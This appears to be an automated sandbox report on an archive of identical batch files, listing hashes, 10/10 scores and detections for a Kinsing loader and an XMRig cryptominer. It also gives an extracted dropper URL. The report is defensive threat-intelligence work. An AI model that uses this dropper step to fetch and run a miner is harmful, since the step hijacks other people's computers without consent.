Resubmissions

General

  • Target

    NM.zip

  • Size

    8KB

  • Sample

    240124-fqzg1abcgn

  • MD5

    afdb6e69ea3871a344893fa2494c5f74

  • SHA1

    20a0c292f69761c186a07f3643492c2605e5a075

  • SHA256

    04cf0194fb37bcc19b2b63904d84a74c720b64b7938620fdf971bb98a8f47ccd

  • SHA512

    156c21ecf75a96ba1886fa9ce90e9074de4b88f62545bdd1dbedc0346cb5b55b23317135c264db60a975e410d08e2059d78532358247fb9db37249ddba112f2f

  • SSDEEP

    96:IP2bBP22P2vP2AP2mP2fP2hKP2ZP2qP2zP2EP2NP2DP2oP20wKk:i8BC/j8GE+/IpqEDwKk

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://github.com/xmrig/xmrig/releases/download/v6.21.0/xmrig-6.21.0-gcc-win64.zip

Targets

    • Target

      tesy - Copy (10).bat

    • Size

      608B

    • MD5

      727c8da0478af118c957ae60f7161cab

    • SHA1

      cf18105b8659e93bbd2824fa35ef1bae7b395301

    • SHA256

      97db0437ecb6f401a4674dceead7b17a885241f2ab2495652863d2240f3bedab

    • SHA512

      d9cbb46d5f3caa92d3b44301bc96ccfd5552f2ab3e5460362db3b59d23e0a5c34bf78e9387009092ac5c92b4423c03789aa1fc824a4e1388a1363daa6ab54e01

    • Kinsing

      Kinsing is a loader written in Golang.

    • XMRig Miner payload

    • xmrig

      XMRig is a high performance, open source, cross platform CPU/GPU miner.

    • Blocklisted process makes network request

    • Executes dropped EXE

    • Target

      tesy - Copy (11).bat

    • Size

      608B

    • MD5

      727c8da0478af118c957ae60f7161cab

    • SHA1

      cf18105b8659e93bbd2824fa35ef1bae7b395301

    • SHA256

      97db0437ecb6f401a4674dceead7b17a885241f2ab2495652863d2240f3bedab

    • SHA512

      d9cbb46d5f3caa92d3b44301bc96ccfd5552f2ab3e5460362db3b59d23e0a5c34bf78e9387009092ac5c92b4423c03789aa1fc824a4e1388a1363daa6ab54e01

    • Kinsing

      Kinsing is a loader written in Golang.

    • XMRig Miner payload

    • xmrig

      XMRig is a high performance, open source, cross platform CPU/GPU miner.

    • Blocklisted process makes network request

    • Executes dropped EXE

    • Target

      tesy - Copy (12).bat

    • Size

      608B

    • MD5

      727c8da0478af118c957ae60f7161cab

    • SHA1

      cf18105b8659e93bbd2824fa35ef1bae7b395301

    • SHA256

      97db0437ecb6f401a4674dceead7b17a885241f2ab2495652863d2240f3bedab

    • SHA512

      d9cbb46d5f3caa92d3b44301bc96ccfd5552f2ab3e5460362db3b59d23e0a5c34bf78e9387009092ac5c92b4423c03789aa1fc824a4e1388a1363daa6ab54e01

    • Kinsing

      Kinsing is a loader written in Golang.

    • XMRig Miner payload

    • xmrig

      XMRig is a high performance, open source, cross platform CPU/GPU miner.

    • Blocklisted process makes network request

    • Executes dropped EXE

    • Target

      tesy - Copy (13).bat

    • Size

      608B

    • MD5

      727c8da0478af118c957ae60f7161cab

    • SHA1

      cf18105b8659e93bbd2824fa35ef1bae7b395301

    • SHA256

      97db0437ecb6f401a4674dceead7b17a885241f2ab2495652863d2240f3bedab

    • SHA512

      d9cbb46d5f3caa92d3b44301bc96ccfd5552f2ab3e5460362db3b59d23e0a5c34bf78e9387009092ac5c92b4423c03789aa1fc824a4e1388a1363daa6ab54e01

    • Kinsing

      Kinsing is a loader written in Golang.

    • XMRig Miner payload

    • xmrig

      XMRig is a high performance, open source, cross platform CPU/GPU miner.

    • Blocklisted process makes network request

    • Executes dropped EXE

    • Target

      tesy - Copy (14).bat

    • Size

      608B

    • MD5

      727c8da0478af118c957ae60f7161cab

    • SHA1

      cf18105b8659e93bbd2824fa35ef1bae7b395301

    • SHA256

      97db0437ecb6f401a4674dceead7b17a885241f2ab2495652863d2240f3bedab

    • SHA512

      d9cbb46d5f3caa92d3b44301bc96ccfd5552f2ab3e5460362db3b59d23e0a5c34bf78e9387009092ac5c92b4423c03789aa1fc824a4e1388a1363daa6ab54e01

    Score
    10/10
    • XMRig Miner payload

    • xmrig

      XMRig is a high performance, open source, cross platform CPU/GPU miner.

    • Blocklisted process makes network request

    • Executes dropped EXE

    • Target

      tesy - Copy (2).bat

    • Size

      608B

    • MD5

      727c8da0478af118c957ae60f7161cab

    • SHA1

      cf18105b8659e93bbd2824fa35ef1bae7b395301

    • SHA256

      97db0437ecb6f401a4674dceead7b17a885241f2ab2495652863d2240f3bedab

    • SHA512

      d9cbb46d5f3caa92d3b44301bc96ccfd5552f2ab3e5460362db3b59d23e0a5c34bf78e9387009092ac5c92b4423c03789aa1fc824a4e1388a1363daa6ab54e01

    Score
    10/10
    • XMRig Miner payload

    • xmrig

      XMRig is a high performance, open source, cross platform CPU/GPU miner.

    • Blocklisted process makes network request

    • Executes dropped EXE

    • Target

      tesy - Copy (3).bat

    • Size

      608B

    • MD5

      727c8da0478af118c957ae60f7161cab

    • SHA1

      cf18105b8659e93bbd2824fa35ef1bae7b395301

    • SHA256

      97db0437ecb6f401a4674dceead7b17a885241f2ab2495652863d2240f3bedab

    • SHA512

      d9cbb46d5f3caa92d3b44301bc96ccfd5552f2ab3e5460362db3b59d23e0a5c34bf78e9387009092ac5c92b4423c03789aa1fc824a4e1388a1363daa6ab54e01

    Score
    10/10
    • XMRig Miner payload

    • xmrig

      XMRig is a high performance, open source, cross platform CPU/GPU miner.

    • Blocklisted process makes network request

    • Executes dropped EXE

    • Target

      tesy - Copy (4).bat

    • Size

      608B

    • MD5

      727c8da0478af118c957ae60f7161cab

    • SHA1

      cf18105b8659e93bbd2824fa35ef1bae7b395301

    • SHA256

      97db0437ecb6f401a4674dceead7b17a885241f2ab2495652863d2240f3bedab

    • SHA512

      d9cbb46d5f3caa92d3b44301bc96ccfd5552f2ab3e5460362db3b59d23e0a5c34bf78e9387009092ac5c92b4423c03789aa1fc824a4e1388a1363daa6ab54e01

    Score
    10/10
    • XMRig Miner payload

    • xmrig

      XMRig is a high performance, open source, cross platform CPU/GPU miner.

    • Blocklisted process makes network request

    • Executes dropped EXE

    • Target

      tesy - Copy (5).bat

    • Size

      608B

    • MD5

      727c8da0478af118c957ae60f7161cab

    • SHA1

      cf18105b8659e93bbd2824fa35ef1bae7b395301

    • SHA256

      97db0437ecb6f401a4674dceead7b17a885241f2ab2495652863d2240f3bedab

    • SHA512

      d9cbb46d5f3caa92d3b44301bc96ccfd5552f2ab3e5460362db3b59d23e0a5c34bf78e9387009092ac5c92b4423c03789aa1fc824a4e1388a1363daa6ab54e01

    Score
    10/10
    • XMRig Miner payload

    • xmrig

      XMRig is a high performance, open source, cross platform CPU/GPU miner.

    • Blocklisted process makes network request

    • Executes dropped EXE

    • Target

      tesy - Copy (6).bat

    • Size

      608B

    • MD5

      727c8da0478af118c957ae60f7161cab

    • SHA1

      cf18105b8659e93bbd2824fa35ef1bae7b395301

    • SHA256

      97db0437ecb6f401a4674dceead7b17a885241f2ab2495652863d2240f3bedab

    • SHA512

      d9cbb46d5f3caa92d3b44301bc96ccfd5552f2ab3e5460362db3b59d23e0a5c34bf78e9387009092ac5c92b4423c03789aa1fc824a4e1388a1363daa6ab54e01

    Score
    10/10
    • XMRig Miner payload

    • xmrig

      XMRig is a high performance, open source, cross platform CPU/GPU miner.

    • Blocklisted process makes network request

    • Executes dropped EXE

    • Target

      tesy - Copy (7).bat

    • Size

      608B

    • MD5

      727c8da0478af118c957ae60f7161cab

    • SHA1

      cf18105b8659e93bbd2824fa35ef1bae7b395301

    • SHA256

      97db0437ecb6f401a4674dceead7b17a885241f2ab2495652863d2240f3bedab

    • SHA512

      d9cbb46d5f3caa92d3b44301bc96ccfd5552f2ab3e5460362db3b59d23e0a5c34bf78e9387009092ac5c92b4423c03789aa1fc824a4e1388a1363daa6ab54e01

    Score
    10/10
    • XMRig Miner payload

    • xmrig

      XMRig is a high performance, open source, cross platform CPU/GPU miner.

    • Blocklisted process makes network request

    • Executes dropped EXE

    • Target

      tesy - Copy (8).bat

    • Size

      608B

    • MD5

      727c8da0478af118c957ae60f7161cab

    • SHA1

      cf18105b8659e93bbd2824fa35ef1bae7b395301

    • SHA256

      97db0437ecb6f401a4674dceead7b17a885241f2ab2495652863d2240f3bedab

    • SHA512

      d9cbb46d5f3caa92d3b44301bc96ccfd5552f2ab3e5460362db3b59d23e0a5c34bf78e9387009092ac5c92b4423c03789aa1fc824a4e1388a1363daa6ab54e01

    Score
    10/10
    • XMRig Miner payload

    • xmrig

      XMRig is a high performance, open source, cross platform CPU/GPU miner.

    • Blocklisted process makes network request

    • Executes dropped EXE

    • Target

      tesy - Copy (9).bat

    • Size

      608B

    • MD5

      727c8da0478af118c957ae60f7161cab

    • SHA1

      cf18105b8659e93bbd2824fa35ef1bae7b395301

    • SHA256

      97db0437ecb6f401a4674dceead7b17a885241f2ab2495652863d2240f3bedab

    • SHA512

      d9cbb46d5f3caa92d3b44301bc96ccfd5552f2ab3e5460362db3b59d23e0a5c34bf78e9387009092ac5c92b4423c03789aa1fc824a4e1388a1363daa6ab54e01

    Score
    10/10
    • XMRig Miner payload

    • xmrig

      XMRig is a high performance, open source, cross platform CPU/GPU miner.

    • Blocklisted process makes network request

    • Executes dropped EXE

    • Target

      tesy - Copy.bat

    • Size

      608B

    • MD5

      727c8da0478af118c957ae60f7161cab

    • SHA1

      cf18105b8659e93bbd2824fa35ef1bae7b395301

    • SHA256

      97db0437ecb6f401a4674dceead7b17a885241f2ab2495652863d2240f3bedab

    • SHA512

      d9cbb46d5f3caa92d3b44301bc96ccfd5552f2ab3e5460362db3b59d23e0a5c34bf78e9387009092ac5c92b4423c03789aa1fc824a4e1388a1363daa6ab54e01

    Score
    10/10
    • XMRig Miner payload

    • xmrig

      XMRig is a high performance, open source, cross platform CPU/GPU miner.

    • Blocklisted process makes network request

    • Executes dropped EXE

    • Target

      tesy.bat

    • Size

      608B

    • MD5

      727c8da0478af118c957ae60f7161cab

    • SHA1

      cf18105b8659e93bbd2824fa35ef1bae7b395301

    • SHA256

      97db0437ecb6f401a4674dceead7b17a885241f2ab2495652863d2240f3bedab

    • SHA512

      d9cbb46d5f3caa92d3b44301bc96ccfd5552f2ab3e5460362db3b59d23e0a5c34bf78e9387009092ac5c92b4423c03789aa1fc824a4e1388a1363daa6ab54e01

    Score
    10/10
    • XMRig Miner payload

    • xmrig

      XMRig is a high performance, open source, cross platform CPU/GPU miner.

    • Blocklisted process makes network request

    • Executes dropped EXE

MITRE ATT&CK Matrix

Tasks